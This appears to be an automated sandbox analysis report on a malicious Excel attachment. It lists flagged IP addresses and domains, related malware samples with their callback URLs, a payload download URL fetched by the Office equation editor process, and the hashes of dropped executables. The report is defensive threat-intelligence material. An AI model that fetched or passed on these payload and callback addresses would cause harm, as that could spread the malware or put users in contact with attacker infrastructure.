http://www.myspace.com/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.centrum.cz/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://p.zhongsou.com/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://service2.bfast.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.comPA	explorer.exe, 00000007.00000000.2176816601.0000000001C70000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://ariadna.elmundo.es/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.news.com.au/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.cdiscount.com/	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.tiscali.it/favicon.ico	explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
18.195.87.136	unknown	United States	16509	AMAZON-02US	true
35.246.6.109	unknown	United States	15169	GOOGLEUS	true
34.102.136.180	unknown	United States	15169	GOOGLEUS	true
199.34.228.73	unknown	United States	27647	WEEBLYUS	true
94.73.146.42	unknown	Turkey	34619	CIZGITR	true
54.254.26.94	unknown	United States	16509	AMAZON-02US	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	339199
Start date:	13.01.2021
Start time:	17:16:08
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	NEW 01 13 2021.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@11/6@6/6
EGA Information:	Failed
HDC Information:	Successful, ratio: 17% (good quality ratio 15.9%) Quality average: 67.9% Quality standard deviation: 29.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 81 Number of non-executed functions: 46
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe

Simulations

Behavior and APIs

Time	Type	Description
17:17:09	API Interceptor	51x Sleep call for process: EQNEDT32.EXE modified
17:17:11	API Interceptor	153x Sleep call for process: vbc.exe modified
17:17:43	API Interceptor	225x Sleep call for process: chkdsk.exe modified
17:18:19	API Interceptor	1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
35.246.6.109	13012021.exe	Get hash	malicious	Browse	www.bundletvdeal.com/rbg/?-ZV4gjY=to4tkdRL4YHA7dFuLU2eXo05W8isULo1FyIdtylq+bSQeog839DOSFLS2i7IODeWwLrq&-ZSl=1bgPBf
	5DY3NrVgpI.exe	Get hash	malicious	Browse	www.tokachiashi50.xyz/de92/?AjR=9r4L1&FdC4E2D=DPoRsgVn0ximhxQQlPjeokREX/UlirV5eRM8dxhcnaqNY4JbxsfONmN6rFGqDxwHgkPo+9oGSw==
	Revise Order.exe	Get hash	malicious	Browse	www.brian.productions/ehxh/?Lh0l=ZTdpL2D0k&nVjxUJ=CZx2i55e3gGiW4/DSVy15Qy0G8363Kbzg9nIH4VtHAka16TJPcE8hbtAvrpVwAXJXJrP
	quote.exe	Get hash	malicious	Browse	www.celerationeducation.com/knb/?EjUHDz=fdM8vL4XuV&9rN4eR=EZcXz466rumSDBpdu/Qq8XPG+U1yHO6YRL94ofeMuKEdfpTZINiN5O0jpAXngdJo5VDm3mGghw==
	DTwcHU5qyI.exe	Get hash	malicious	Browse	www.tokachiashi50.xyz/de92/?lJELz4=DPoRsgVn0ximhxQQlPjeokREX/UlirV5eRM8dxhcnaqNY4JbxsfONmN6rFGTcAQEuyTv+9oBBA==&uVg8=3fLpHXkX8
	SEA LION LOGISTICS-URGENT QUOTATION.exe	Get hash	malicious	Browse	www.albertosilva.online/oge8/?pPU=EFQxUL1HhHpL&abvDxBr=10cnRnzbg3vVADwDI3oHDHdqCa26NyIrPT2AJhUQLFJntxNMNpxEVPDpZS2GpPRm/3SU
	current productlist.exe	Get hash	malicious	Browse	www.brian.productions/ehxh/?kRcDUld=CZx2i55e3gGiW4/DSVy15Qy0G8363Kbzg9nIH4VtHAka16TJPcE8hbtAvoF8zArxeqeZIu/xaQ==&lZ9D=p2JpVPJHKZml3dvp
	List.exe	Get hash	malicious	Browse	www.jacksonarearealestate.com/2kf/?UR-X423=q6+emO9k8TlYm3w4k0XfieU6EAeXVQK5qEFrNBHw70+yoBenCaqB4YVZV0U51sOgUQyoLxKh/w==&mL08l=WZA0u2VhjbRpJ
	SWIFT USD 354,883.00.exe	Get hash	malicious	Browse	www.commonscentsbychloe.com/6bu2/?DjU4Hl=gbG8jNk0zBv&YL0=Di+invltJ/hOxz8XB/UG8S0SoTTxBpXMr7BlMVQ1ePWRgJfo7P+N4VSJVAiAqq5xtRZK
	n41pVXkYCe.exe	Get hash	malicious	Browse	www.coryfireshop.com/jskg/?8pJPDtoX=SCba9D+LCQ9pgG5TU91RtF7xTvsGq/MecUZpawoo/YuOf3cwXZ3KsnuCKgiVYd/qiE23CGFmLw==&CvL0=inCTmHzH
	YT0nfh456s.exe	Get hash	malicious	Browse	www.1819apparel.com/csv8/?jFNHHj=XtNGIsK9NyfrmSyC60HBpItz0Umgq62yD1Tk73refEWRTM8pCZ2m1g8hKcSzDk9QiasX&Ppd=_6g8yvxH-6HLN
	kqwqyoFz1C.exe	Get hash	malicious	Browse	www.coryfireshop.com/jskg/?9roHn=SCba9D+LCQ9pgG5TU91RtF7xTvsGq/MecUZpawoo/YuOf3cwXZ3KsnuCKjOWEtzSvlLh&npHhW=3fq4gDD0abs8
	53McmgaUJP.exe	Get hash	malicious	Browse	www.coryfireshop.com/jskg/?Aro=SCba9D+LCQ9pgG5TU91RtF7xTvsGq/MecUZpawoo/YuOf3cwXZ3KsnuCKgiVYd/qiE23CGFmLw==&_jnt0j=gBdlaxwH1hm
	RFQ 00068643 New Order Shipment to Jebel Ali Port UAE.exe	Get hash	malicious	Browse	www.mo-kita.com/x2ee/?8pGxKNk8=261yz/MnTj7xtn6SNLa90bjMVsKsnNGqms24xwKp9PvGScbvpkAJNaVs89+T7MDWvJex&DzudC=Bxo0src
	jEgLNI40Ro9O775.exe	Get hash	malicious	Browse	www.whereinthezooareyou.com/e66m/?Qzu=DIL8tOhe96aw2RsVV7qlioXlfu61iezVxIGgAihhKL10yRQ8TBy8+AsXFZwEyHoSjwPy&tZUX=QtxX3N6pmn8HFjP
	MR3Pv2KUUr.exe	Get hash	malicious	Browse	www.medisors.com/5tsq/?SzuPiJ=9Cg1os0pNOJ4QNoT5UdGN04DRGp5q7SRvreHvm9cEMKrkKpvGUxN1jI5XfiS1Sg+ufCv&PR3=uTyXQJdhBZjx
	qItg1v4pVH.exe	Get hash	malicious	Browse	www.thepoetrictedstudio.com/bw82/?mpyLR2nH=RsrdfQA5mS60+WzVQF//8cbwzrXLIF3fF+o+nHpDVSzwZDE8R2fNyvkoHJWPgBdgHZ784Yk8gA==&GFNTM=9rS01LiX
	googlechrome_3843.exe	Get hash	malicious	Browse	www.1819apparel.com/csv8/?jL30v=XtNGIsK9NyfrmSyC60HBpItz0Umgq62yD1Tk73refEWRTM8pCZ2m1g8hKfyjMFto8/FQ&JB4DYN=9rhd62lx1hk
	Unode.exe	Get hash	malicious	Browse	www.thedrinks.agency/gtb/?t6A8=P+rEZVlhTdBZrru+dtgZ5AhlIbV67FD1O+P8ndK7aanHRJ0S8ELp71IbJZY77DmCVnNF&9r4l2=xPGHVlS8
	WpJEtP9wr0.exe	Get hash	malicious	Browse	www.1819apparel.com/csv8/?p0D=XtNGIsK9NyfrmSyC60HBpItz0Umgq62yD1Tk73refEWRTM8pCZ2m1g8hKfyJT1do49NQ&wR=BFNh2tk8Ejyl5
34.102.136.180	PO85937758859777.xlsx	Get hash	malicious	Browse	www.bodyfuelrtd.com/8rg4/?RJ=A4ItsHP7WirPGvorxE1FqdRUH2iuHEJ7Bx0GuGGPjza4UX3M9OXu5uVQhTJ1ITDXtosJtw==&LFQHH=_pgx3Rd
	Order_385647584.xlsx	Get hash	malicious	Browse	www.oohdough.com/csv8/?NP=oR+kRp92OlWNPHb8tFeSfFFusuQV5SLrlvHcvTTApHN9lxDZF+KzMj/NshbaIk6/gJtwpQ==&nN6l9T=K0GdGdPX7JyL
	PO#218740.exe	Get hash	malicious	Browse	www.epochryphal.com/wpsb/?Wxo=n7b+ISrk/mPyWzbboTpvP41tNOKzDU5etPpa3uuDPgrT9THM2mbO6pyh4trMr+rUEpul&vB=lhv8
	20210111 Virginie.exe	Get hash	malicious	Browse	www.mrkabaadiwala.com/ehxh/?Gzux=8Ka3Lv4ePZYbHHrfWWyIjg6yKJpjzOn7QTDTNOD0A86ZD78kMrm+GgFnyvrieFQhDFXfm2RQfw==&AnB=O0DToLD8K
	20210113155320.exe	Get hash	malicious	Browse	www.ortigiarealty.com/dkk/?BZ=59qCdC3RMUvEyWKLbbpm6Z+GlV/JTwbDjS9GwZYTXRwVfK7Z9ENGl/302ncjjG4TtqPC&I6A=4hOhA0
	13012021.exe	Get hash	malicious	Browse	www.sydiifinancial.com/rbg/?-ZV4gjY=zsOc27F1WxfzCuYGlMZHORhUu2hDO+A8T5/oUCY+tOSiKp0YV+JX8kcBbP6nsiP5HbIi&-ZSl=1bgPBf
	Po-covid19 2372#w2..exe	Get hash	malicious	Browse	www.thesaltlifestyle.com/p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct
	FtLroeD5Kmr6rNC.exe	Get hash	malicious	Browse	www.abilitiesin.com/umSa/?8p=z9MTiPW3cvjSA5QkES0lRL7QE5QWzpSIb/5mf6QApKD6hYKwb/M4i12nx+gX2coGSm9PIjo5qw==&o2=jL30vpcXe
	6blnUJRr4yKrjCS.exe	Get hash	malicious	Browse	www.vettedwealthmanagement.com/umSa/?ET8T=brJeVU7eljMQcn5t6nrZLyoDpHpFr+iqwzUSRB88e+cRILPvJ2TiW12sA30gV7y33iXX&URfl=00DdGJE8CBEXFLip
	Consignment Document PL&BL Draft.exe	Get hash	malicious	Browse	www.basalmeals.com/h3qo/?CR=nh/gKqoyV5HeFjYxMy0eFbMJOpM49Sz3DGf/FH2Dw3liEqigPonoEfAZFGiauGMw1oau&RX=dnC44rW8qdHLY2q
	5DY3NrVgpI.exe	Get hash	malicious	Browse	www.schustermaninterests.com/de92/?FdC4E2D=otFI+gArfm9oxno+NlFHPe8CZ87dio0DjOpD7CEQ1ohXI6jwcMVL1BNDFt16zf60LSstTEfOYg==&AjR=9r4L1
	xrxSVsbRli.exe	Get hash	malicious	Browse	www.luxpropertyandassociates.com/nki/?yrsdQvAx=9rwO08mLgykW/+F5WoH4KAy1ieMCsMl+05AKyLP7HaXoaQuR30wAwJPKQnvqcJUpdIyD&D8h8=kHux
	3S1VPrT4IK.exe	Get hash	malicious	Browse	www.qiemfsolutions.com/xle/?D8bDL=df7alruH/sVOZEWxdb4cimNlzghqglI+JQbYN3M53vXLFmJTlVjRvjRu86vT99I8VeyiFG/dAw==&nbph=uzu87Xq
	AOA4sx8Z7l.exe	Get hash	malicious	Browse	www.eventsdonevirtually.com/c8so/?Wx=JxEHfAEgu9b4xQJDcyjTWSaEjlpoxhWg+fCl4c24OKbRsAQRgKKiPuXHFwp0UmB835cw&vB=lhr0E
	g2fUeYQ7Rh.exe	Get hash	malicious	Browse	www.multipleofferonline.com/nki/?-Z1l=5yWKC4X4OOjUIUftTYCRYdpq8XI+R2ST+EfenRWsFQpL7Lmr0RV0+cHmGR5gosgcZWiS+YlJJw==&5ju=UlSpo
	pHUWiFd56t.exe	Get hash	malicious	Browse	www.brainandbodystrengthcoach.com/csv8/?Rxl=4rzgp1jZc7l8Whg0IztLQnvubqNqMY/2oz5HEUeZ+SGIDqCjyjtIs6qqwzFhp9I+dVCC&LJB=GbtlyLR0j
	invoice.xlsx	Get hash	malicious	Browse	www.cleverwares.com/c8so/?AFNDR=7n20cVCpbL7dqxQ&BBW=P253+QYRdhKTDdzjq4pa7Wp7svBpTNddHFol+cUWSKGzAXl94gLhBIvIcI/Xp4fU197lMA==
	BSL 01321 PYT.xlsx	Get hash	malicious	Browse	www.e-butchery.com/de92/?GBHXf2VP=SyfQvNxnxGuBvZveE7q+Mx8oTZDk0vYyrvtp8jcHqguCzq9Wh/Rqj3ZWA4DRZ6ODcHDiqw==&bB=oN64w0
	payment advice.xlsx	Get hash	malicious	Browse	www.fatboidonuts.com/wgn/?QDKx=ismPDkb1kDsJJlmQEj1IWX8WHEdOBI7aPWpMJ4Az70/HitJ3Qnb/ojRR8i7WZLNLjqtDug==&MDHl9T=mps01jexw
	Arrival notice.xlsx	Get hash	malicious	Browse	www.george-beauty.com/oean/?pJEtdJ=YYiBnx+uTbiyOiWOsIleXMl+TWVBeMM+hRG2hzgR9H7uS/Z2u5QgYOS3OsKMSH1P3GhSdw==&pL08=Grxte8Fh1bipd8g

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ladi-dns-ssl-nlb-prod-1499fa9d75307fb9.elb.ap-southeast-1.amazonaws.com	RFQ January.exe	Get hash	malicious	Browse	54.254.26.94
	RFQ1101.exe	Get hash	malicious	Browse	13.251.251.159
	Xqgvj3afT1.exe	Get hash	malicious	Browse	52.221.6.123
	SHIPPING.EXE	Get hash	malicious	Browse	13.251.251.159
td-balancer-euw2-6-109.wixdns.net	13012021.exe	Get hash	malicious	Browse	35.246.6.109
	5DY3NrVgpI.exe	Get hash	malicious	Browse	35.246.6.109
	Revise Order.exe	Get hash	malicious	Browse	35.246.6.109
	quote.exe	Get hash	malicious	Browse	35.246.6.109
	DTwcHU5qyI.exe	Get hash	malicious	Browse	35.246.6.109
	SEA LION LOGISTICS-URGENT QUOTATION.exe	Get hash	malicious	Browse	35.246.6.109
	current productlist.exe	Get hash	malicious	Browse	35.246.6.109
	List.exe	Get hash	malicious	Browse	35.246.6.109
	SWIFT USD 354,883.00.exe	Get hash	malicious	Browse	35.246.6.109
	RTV900021234.exe	Get hash	malicious	Browse	35.246.6.109
	n41pVXkYCe.exe	Get hash	malicious	Browse	35.246.6.109
	YT0nfh456s.exe	Get hash	malicious	Browse	35.246.6.109
	kqwqyoFz1C.exe	Get hash	malicious	Browse	35.246.6.109
	53McmgaUJP.exe	Get hash	malicious	Browse	35.246.6.109
	RFQ 00068643 New Order Shipment to Jebel Ali Port UAE.exe	Get hash	malicious	Browse	35.246.6.109
	jEgLNI40Ro9O775.exe	Get hash	malicious	Browse	35.246.6.109
	MR3Pv2KUUr.exe	Get hash	malicious	Browse	35.246.6.109
	qItg1v4pVH.exe	Get hash	malicious	Browse	35.246.6.109
	googlechrome_3843.exe	Get hash	malicious	Browse	35.246.6.109
	Unode.exe	Get hash	malicious	Browse	35.246.6.109
www.acdfr.com	qItg1v4pVH.exe	Get hash	malicious	Browse	199.34.228.73
www.acdfr.com	Xqgvj3afT1.exe	Get hash	malicious	Browse	199.34.228.73

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GOOGLEUS	PO85937758859777.xlsx	Get hash	malicious	Browse	34.102.136.180
	BankSwiftCopyUSD95000.ppt	Get hash	malicious	Browse	108.177.127.132
	Order_385647584.xlsx	Get hash	malicious	Browse	34.102.136.180
	rB26M8hfIh.exe	Get hash	malicious	Browse	8.8.8.8
	brewin-Invoice024768-xlsx.Html	Get hash	malicious	Browse	216.239.34.21
	WFLPGBTMZH.dll	Get hash	malicious	Browse	108.177.126.132
	PO#218740.exe	Get hash	malicious	Browse	34.98.99.30
	20210111 Virginie.exe	Get hash	malicious	Browse	34.102.136.180
	20210113155320.exe	Get hash	malicious	Browse	34.102.136.180
	13012021.exe	Get hash	malicious	Browse	34.102.136.180
	Po-covid19 2372#w2..exe	Get hash	malicious	Browse	34.102.136.180
	FtLroeD5Kmr6rNC.exe	Get hash	malicious	Browse	35.204.150.5
	6blnUJRr4yKrjCS.exe	Get hash	malicious	Browse	34.102.136.180
	Consignment Document PL&BL Draft.exe	Get hash	malicious	Browse	34.102.136.180
	5DY3NrVgpI.exe	Get hash	malicious	Browse	34.102.136.180
	xrxSVsbRli.exe	Get hash	malicious	Browse	34.102.136.180
	3S1VPrT4IK.exe	Get hash	malicious	Browse	34.102.136.180
	AOA4sx8Z7l.exe	Get hash	malicious	Browse	34.102.136.180
	81msxxUisn.exe	Get hash	malicious	Browse	216.239.36.21
	g2fUeYQ7Rh.exe	Get hash	malicious	Browse	34.102.136.180
GOOGLEUS	PO85937758859777.xlsx	Get hash	malicious	Browse	34.102.136.180
	BankSwiftCopyUSD95000.ppt	Get hash	malicious	Browse	108.177.127.132
	Order_385647584.xlsx	Get hash	malicious	Browse	34.102.136.180
	rB26M8hfIh.exe	Get hash	malicious	Browse	8.8.8.8
	brewin-Invoice024768-xlsx.Html	Get hash	malicious	Browse	216.239.34.21
	WFLPGBTMZH.dll	Get hash	malicious	Browse	108.177.126.132
	PO#218740.exe	Get hash	malicious	Browse	34.98.99.30
	20210111 Virginie.exe	Get hash	malicious	Browse	34.102.136.180
	20210113155320.exe	Get hash	malicious	Browse	34.102.136.180
	13012021.exe	Get hash	malicious	Browse	34.102.136.180
	Po-covid19 2372#w2..exe	Get hash	malicious	Browse	34.102.136.180
	FtLroeD5Kmr6rNC.exe	Get hash	malicious	Browse	35.204.150.5
	6blnUJRr4yKrjCS.exe	Get hash	malicious	Browse	34.102.136.180
	Consignment Document PL&BL Draft.exe	Get hash	malicious	Browse	34.102.136.180
	5DY3NrVgpI.exe	Get hash	malicious	Browse	34.102.136.180
	xrxSVsbRli.exe	Get hash	malicious	Browse	34.102.136.180
	3S1VPrT4IK.exe	Get hash	malicious	Browse	34.102.136.180
	AOA4sx8Z7l.exe	Get hash	malicious	Browse	34.102.136.180
	81msxxUisn.exe	Get hash	malicious	Browse	216.239.36.21
	g2fUeYQ7Rh.exe	Get hash	malicious	Browse	34.102.136.180
AMAZON-02US	PO85937758859777.xlsx	Get hash	malicious	Browse	52.58.78.16
	rB26M8hfIh.exe	Get hash	malicious	Browse	3.9.11.11
	PO#218740.exe	Get hash	malicious	Browse	52.58.78.16
	FtLroeD5Kmr6rNC.exe	Get hash	malicious	Browse	3.14.169.138
	Consignment Document PL&BL Draft.exe	Get hash	malicious	Browse	52.58.78.16
	5DY3NrVgpI.exe	Get hash	malicious	Browse	52.58.78.16
	cGLVytu1ps.exe	Get hash	malicious	Browse	18.183.7.206
	pHUWiFd56t.exe	Get hash	malicious	Browse	52.51.72.229
	BSL 01321 PYT.xlsx	Get hash	malicious	Browse	3.23.184.84
	mssecsvr.exe	Get hash	malicious	Browse	54.103.115.211
	ACH PAYMENT REMlTTANCE.xlsx	Get hash	malicious	Browse	34.213.143.100
	ACH PAYMENT REMlTTANCE.xlsx	Get hash	malicious	Browse	13.226.169.25
	quotation.exe	Get hash	malicious	Browse	52.212.68.12
	6OUYcd3GIs.exe	Get hash	malicious	Browse	3.13.31.214
	Consignment Details.exe	Get hash	malicious	Browse	52.58.78.16
	anydesk (1).exe	Get hash	malicious	Browse	54.194.255.175
	Shipping Documents PL&BL Draft.exe	Get hash	malicious	Browse	3.14.169.138
	Purchase Order -263.exe	Get hash	malicious	Browse	52.58.78.16
	RFQ January.exe	Get hash	malicious	Browse	54.254.26.94
	SCAN_20210112_132640143,pdf.exe	Get hash	malicious	Browse	44.227.76.166

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	844800
Entropy (8bit):	7.2201577503513095
Encrypted:	false
SSDEEP:	12288:30gZLSqdlOdVczGeXYVRiVXOEjmpFOfGj+sox7Bt:k8FGOz3ITiFOSmpqm+soxb
MD5:	6A763ED09B2FD9F663BCB0AF7B17D492
SHA1:	6F6919DD3AE4F7FBEFC51F8BFC280078A7634BEE
SHA-256:	BA2963B7DA8A1DF3E40441825654972CE2A5903C9F27BC081E42795C296C80EB
SHA-512:	F87F4D58A02CF9DDBB4CDA9E0309EBD393B4F98DC63BAAD92559CD7D932C2AF4C52B64FAA8774F040A994FA158619DF14E7F2E1DC48DE7C45714840291AA968A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	http://18.195.87.136/ttkkz/file2.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c.._..............P.................. ........@.. .......................@............@.....................................K............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........>..........C...h6...............................................+.&..(....6+.&...(........0...................... +.. ..A.X .%.Y ....a ....c;h....... .h.. .h..aYE...._..........R....... .s.&e f.7.Y ....cfYE....d...L...8w... Dx..e #...a ].!.X ....c* +.T.efe ...Y* ....f ....c* .... ..N.Y ..b.X* .I~. h..a .M..X .<)a .uR. e...Y >9..a .L..Y* ..f. ..o.Y ....a /...X ....Y*...0..........+.&..s.........+F..!a.+...&a8......&X+@..(=....+....YE....8...J...\...n.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31FF70E4.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1099960
Entropy (8bit):	2.0153178864757546
Encrypted:	false
SSDEEP:	3072:QXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:eahIFdyiaT2qtXw
MD5:	CA49FFBCDFC7617954974AD0CBAF9E19
SHA1:	375034213F83F54732EC52DEA01F977EC6EA4439
SHA-256:	87865F61D5F58CEAB79863AB353702ADE27E5F083E2C82C3555D88DD5D201FDF
SHA-512:	7ECADAF9AF2C27FF7E08D3F85C7E9EF0C993BA94ED8CD7BD10DC53453B77FCB56EBF904F91D76627E982B8F281C904E8E6ACFFC8A3193156B1871077AFE01491
Malicious:	false
Reputation:	low
Preview:	....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................0.0.0.......0...0..N;S..0...0.......0.x.0..N;S..0...0. ....y.Q..0...0. ............z.Q............................................X...%...7...................{ .@................C.a.l.i.b.r............. .0.X.....0...0..2.Q..........0...0..{.Q....$.0.....dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\57379395.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC2CDC92.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\Desktop\~$NEW 01 13 2021.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	844800
Entropy (8bit):	7.2201577503513095
Encrypted:	false
SSDEEP:	12288:30gZLSqdlOdVczGeXYVRiVXOEjmpFOfGj+sox7Bt:k8FGOz3ITiFOSmpqm+soxb
MD5:	6A763ED09B2FD9F663BCB0AF7B17D492
SHA1:	6F6919DD3AE4F7FBEFC51F8BFC280078A7634BEE
SHA-256:	BA2963B7DA8A1DF3E40441825654972CE2A5903C9F27BC081E42795C296C80EB
SHA-512:	F87F4D58A02CF9DDBB4CDA9E0309EBD393B4F98DC63BAAD92559CD7D932C2AF4C52B64FAA8774F040A994FA158619DF14E7F2E1DC48DE7C45714840291AA968A
Malicious:	true
